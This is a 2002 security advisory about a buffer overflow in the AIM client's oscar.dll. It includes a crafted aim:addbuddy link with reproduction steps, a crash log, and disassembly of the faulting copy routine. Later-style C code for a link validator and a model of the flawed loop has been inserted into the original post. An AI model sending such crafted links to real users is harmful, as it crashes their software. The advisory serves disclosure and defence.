From: Adonis.No.Spam (adonis1 videotron.ca)
Date: Thu Mar 07 2002 - 06:23:25 CST
.--------.
/ Bugs \
+-----------------------------------------------------------------------.
:
Affected : All versions of AIM including the beta 4.8.2646 :
Type : Local/Remote Buffer Overflow :
Date : 29-02-2002 :
Author : NtWaK0 & Recon
www.SafeHack.com :
+-----------------------------------------------------------------------.
We think this was not reported. Nothing was found publicly about this.
+------------------.
Crash of AIM Client \
+--------------------`--------------------------------------------------.
:
+-----------. :
Disclaimer \ :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on :
experiments though it may be false. The opinions expressed in this :
advisory and program are my own and NOT of any company. :
In fact, I do not work for anyone at the present time. :
:
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone :
does with this information. :
Remember: Use a computer in ways that ensure respect for your fellows. :
:
+-------------. :
Brief History \ :
+---------------`-------------------------------------------------------.
If you are running any version of AIM (AOL Instant Messenger) you are :
affected by this crash; the vendor has been informed. :
:
AOL's Instant Messenger client (AIM) contains a buffer overflow :
vulnerability in the file oscar.dll. :
Instant Messenger allows AOL users to send short messages between :
its users. The overflow occurs in oscar.dll during a byte copy through :
the al register. :
:
+---------------------------+ :
>>> Test OS Applications <<< :
+---------------------------+ :
Tested on all versions of the Microsoft Windows family of OSes with the :
latest beta version of AIM, 4.8.2646. :
:
+-----------. :
The Problem \ :
+-------------`---------------------------------------------------------.
Normally I do not use AIM. But a friend of mine "Recon" told me about a :
strange problem he found. Since I am curious I did install AIM and did :
some tests to find out what was going on. Again, thanks Recon. :
:
:
The buffer overflow will happen if you send a specially crafted message :
to an AIM user. :
:
:
:
To see the buffer overflow, do the following steps: :
1- Make sure you have AIM 4.8.2646 installed. :
2- Open a new IM window and click the link button to set up a hyperlink :
for your buddy. :
3- Input the exact text into the link: :
aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,:
12345678,12345678,12345678,12345678,12345678,12345678&groupname= :
12345678,12345678,12345678,12345678,12345678,12345678,12345678 :
,12345678,12345678,12345678, :
:
4- The text can be anything as long as it follows the format: 8 :
characters for each word to add as a screenname and a groupname, with :
11 instances for the screenname and 10 for the groupname. :
5- A memory dump will occur as soon as the hyperlink is clicked by :
either side (you or your buddy). :
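The link above only crashes the client because the handler copies the comma-separated lists into a fixed-size buffer without bounding them first. The defensive counterpart is to validate the link before any copy happens. The following validator is an added example, not AIM's code: it parses an aim:addbuddy link, accepts only the screenname and groupname parameters, and rejects the link when any entry is longer than an assumed cap or when the list has more entries than an assumed cap. The two limits (MAX_NAME_LEN, MAX_ENTRIES), the function names and the verdict enum are assumptions for illustration; the crafted link constant is the advisory's own text with its line breaks removed.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not AOL's code. The caps are assumed for illustration,
 * not AIM's real limits. */
#define MAX_NAME_LEN 16   /* assumed cap on one screenname/groupname entry */
#define MAX_ENTRIES   4   /* assumed cap on comma-separated entries per list */

enum aim_verdict { AIM_OK = 0, AIM_BAD_SCHEME, AIM_BAD_PARAM, AIM_TOO_LONG, AIM_TOO_MANY };

/* The advisory's link (11 screennames, 10 group names) joined on one line. */
const char *CRAFTED_LINK =
    "aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,"
    "12345678,12345678,12345678,12345678,12345678,12345678&groupname="
    "12345678,12345678,12345678,12345678,12345678,12345678,12345678"
    ",12345678,12345678,12345678,";

/* Check one comma-separated list of length len: every non-empty entry must be
 * at most MAX_NAME_LEN bytes and there may be at most MAX_ENTRIES of them.
 * Empty entries (e.g. a trailing comma) are ignored. */
static enum aim_verdict check_list(const char *s, size_t len)
{
    size_t entries = 0, cur = 0;
    for (size_t i = 0; i <= len; i++) {
        if (i == len || s[i] == ',') {       /* end of an entry */
            if (cur > 0) {
                if (cur > MAX_NAME_LEN) return AIM_TOO_LONG;
                if (++entries > MAX_ENTRIES) return AIM_TOO_MANY;
            }
            cur = 0;
        } else {
            cur++;
        }
    }
    return AIM_OK;
}

/* Validate an aim:addbuddy link before anything is copied out of it.
 * Only screenname= and groupname= are accepted; anything else is rejected. */
enum aim_verdict validate_addbuddy(const char *url)
{
    static const char prefix[] = "aim:addbuddy?";
    if (strncmp(url, prefix, sizeof prefix - 1) != 0) return AIM_BAD_SCHEME;
    const char *p = url + (sizeof prefix - 1);
    while (*p) {
        const char *eq = strchr(p, '=');
        if (!eq) return AIM_BAD_PARAM;
        const char *amp = strchr(eq, '&');
        size_t klen = (size_t)(eq - p);
        size_t vlen = amp ? (size_t)(amp - eq - 1) : strlen(eq + 1);
        if ((klen == 10 && strncmp(p, "screenname", 10) == 0) ||
            (klen == 9  && strncmp(p, "groupname", 9) == 0)) {
            enum aim_verdict v = check_list(eq + 1, vlen);
            if (v != AIM_OK) return v;
        } else {
            return AIM_BAD_PARAM;           /* unknown parameter name */
        }
        p = amp ? amp + 1 : eq + 1 + vlen;  /* advance to the next parameter */
    }
    return AIM_OK;
}

int main(void)
{
    static const char *names[] = { "ok", "bad scheme", "bad param", "entry too long", "too many entries" };
    printf("benign link : %s\n", names[validate_addbuddy("aim:addbuddy?screenname=alice&groupname=Friends")]);
    printf("crafted link: %s\n", names[validate_addbuddy(CRAFTED_LINK)]);
    return 0;
}
```

The point of checking entry length and entry count separately is that each maps to a different fixed-size destination in a typical handler; rejecting at the parsing boundary means the copy routine never sees input that exceeds its buffer.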
:
This was taken from the Dr. Watson log after the buffer overflow occurred: :
:
function: o_strncpy :
1218b4f9 8b4508 mov eax,[ebp+0x8] ss:00c :
1218b4fc 3b450c cmp eax,[ebp+0xc] ss:00c :
1218b4ff 7419 jz LoadRendezvousString+0x39f6 ( :
1218b501 8a06 mov al,[esi] :
1218b503 8807 mov [edi],al :
1218b505 47 inc edi :
1218b506 ff4508 inc dword ptr [ebp+0x8] ss:00c :
1218b509 46 inc esi :
1218b50a 43 inc ebx :
1218b50b 8a06 mov al,[esi] :
FAULT ->1218b50d 8807 mov [edi],al :
1218b50f 47 inc edi :
1218b510 ff4508 inc dword ptr [ebp+0x8] ss:00c :
1218b513 46 inc esi :
1218b514 43 inc ebx :
1218b515 803e00 cmp byte ptr [esi],0x0 :
1218b518 75cf jnz LoadRendezvousString+0x3bc5 ( :
1218b51a 8b4d0c mov ecx,[ebp+0xc] ss:00c :
1218b51d 3bf9 cmp edi,ecx :
1218b51f 7312 jnb OscoreUseCurrentAcceleratorTable+ :
1218b521 2bcf sub ecx,edi :
1218b523 33c0 xor eax,eax :
:
Below is a portion of the asm code for the file oscar.dll :
=============================================== :
.text:1218B4E9 loc_1218B4E9: ; CODE XREF: o_strncpy+61j :
.text:1218B4E9 cmp edi, [ebp+lpsz] :
.text:1218B4EC jnb short loc_1218B533 :
.text:1218B4EE push esi ; lpsz :
.text:1218B4EF call ds:CharNextA
.text:1218B4F5 cmp eax, ebx
.text:1218B4F7 jnz short loc_1218B50B
.text:1218B4F9 mov eax, [ebp+arg_0]
.text:1218B4FC cmp eax, [ebp+lpsz]
.text:1218B4FF jz short loc_1218B51A
.text:1218B501 mov al, [esi]
.text:1218B503 mov [edi], al
.text:1218B505 inc edi
.text:1218B506 inc [ebp+arg_0]
.text:1218B509 inc esi
.text:1218B50A inc ebx
===============================================
.text:1218B50B loc_1218B50B: ; CODE XREF: o_strncpy+40j
.text:1218B50B mov al, [esi]
.text:1218B50D mov [edi], al ; <<<---HERE IS THE P
.text:1218B50F inc edi
.text:1218B510 inc [ebp+arg_0]
.text:1218B513 inc esi
.text:1218B514 inc ebx
.text:1218B515 cmp byte ptr [esi], 0
.text:1218B518 jnz short loc_1218B4E9
=================================================
.text:1218B51A loc_1218B51A: ; CODE XREF: o_s
.text:1218B51A ; o_strncpy+48j
.text:1218B51A mov ecx, [ebp+lpsz]
.text:1218B51D cmp edi, ecx
.text:1218B51F jnb short loc_1218B533
.text:1218B521 sub ecx, edi
.text:1218B523 xor eax, eax
.text:1218B525 mov edx, ecx
.text:1218B527 shr ecx, 2
.text:1218B52A repe stosd
.text:1218B52C mov ecx, edx
.text:1218B52E and ecx, 3
.text:1218B531 repe stosb
.text:1218B533
==================================================
:
:
:
Here is the stack variables :
=========================== :
00000000 s db 4 dup(?) :
00000004 r db 4 dup(?) :
00000008 arg_0 dd ? :
0000000C lpsz dd ? ; offset (FFFFFFFF) :
00000010 arg_8 dd ? :
:
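One thing the listing and the stack layout make visible is the shape of the copy loop: the destination pointer in edi is compared against the end pointer in [ebp+lpsz] once at loc_1218B4E9, but the path that starts at 1218B501 stores one byte and then falls through into loc_1218B50B, which stores a second byte (the faulting instruction in the Dr. Watson log) before control returns to that check. The C below is an added example, not oscar.dll's code and not a confirmed root-cause analysis of AIM: it models a loop with one bound check per up to two stores next to a corrected loop that checks before every store and always terminates the destination. To observe the overrun without undefined behaviour, the model writes into a scratch area larger than the declared capacity and reports how many bytes landed beyond it; the function names and the capacity of 5 are assumptions for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Added example, not AOL's code: a model of a copy loop whose destination
 * bound is checked once per iteration while the body may store two bytes,
 * mirroring the two stores (1218B503 and 1218B50D) that sit between visits
 * to the check at 1218B4E9. `dst` must point at scratch space at least two
 * bytes larger than `cap` so the overshoot can be measured safely.
 * Returns the number of bytes stored. (Stopping on a NUL after the first
 * store is a simplification so the model never reads past `src`.) */
size_t copy_one_check_two_stores(char *dst, size_t cap, const char *src)
{
    char *d = dst, *end = dst + cap;
    const char *s = src;
    while (d < end && *s) {        /* the only bound check in the loop */
        *d++ = *s++;               /* first store */
        if (*s == '\0') break;
        *d++ = *s++;               /* second store: no check in between */
    }
    return (size_t)(d - dst);
}

/* Corrected loop: a bound check precedes every store, one byte is always
 * reserved for the terminator, and the result is NUL-terminated.
 * Returns the number of bytes stored, excluding the terminator. */
size_t copy_checked(char *dst, size_t cap, const char *src)
{
    size_t n = 0;
    if (cap == 0) return 0;
    while (n + 1 < cap && src[n] != '\0') {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Drives the flawed model with one of the advisory's 8-byte tokens against
 * an assumed capacity of 5 and returns how many bytes went past that cap. */
size_t overrun_bytes(void)
{
    char scratch[16] = {0};        /* bigger than cap so the overshoot is safe */
    size_t stored = copy_one_check_two_stores(scratch, 5, "12345678");
    return stored > 5 ? stored - 5 : 0;
}

/* Same input through the corrected loop; returns the bytes it kept. */
size_t checked_bytes(void)
{
    char scratch[16] = {0};
    return copy_checked(scratch, 5, "12345678");
}

int main(void)
{
    /* Expected: the model overruns the declared capacity by one byte,
     * the corrected loop stores four bytes and a terminator. */
    return (overrun_bytes() == 1 && checked_bytes() == 4) ? 0 : 1;
}
```

The defender's takeaway is structural rather than specific to this binary: any loop that can store more than once between two bound checks overruns by the extra stores, and the fix is to make the check precede each store (or to size the check to the number of bytes the body writes).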
This issue has not been tested on third-party software that supports :
the OSCAR protocol. :
:
+------------. :
The Solution \ :
+--------------`--------------------------------------------------------.
We could not locate an AIM e-mail address to send this issue to. :
+-----------------------------------------------------------------------.
________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good www.SafeHack.com |
Je Pense, Donc Je Suis \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :) --(")--
RFCs are meant to be read and followed…:) /`\ NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow -=-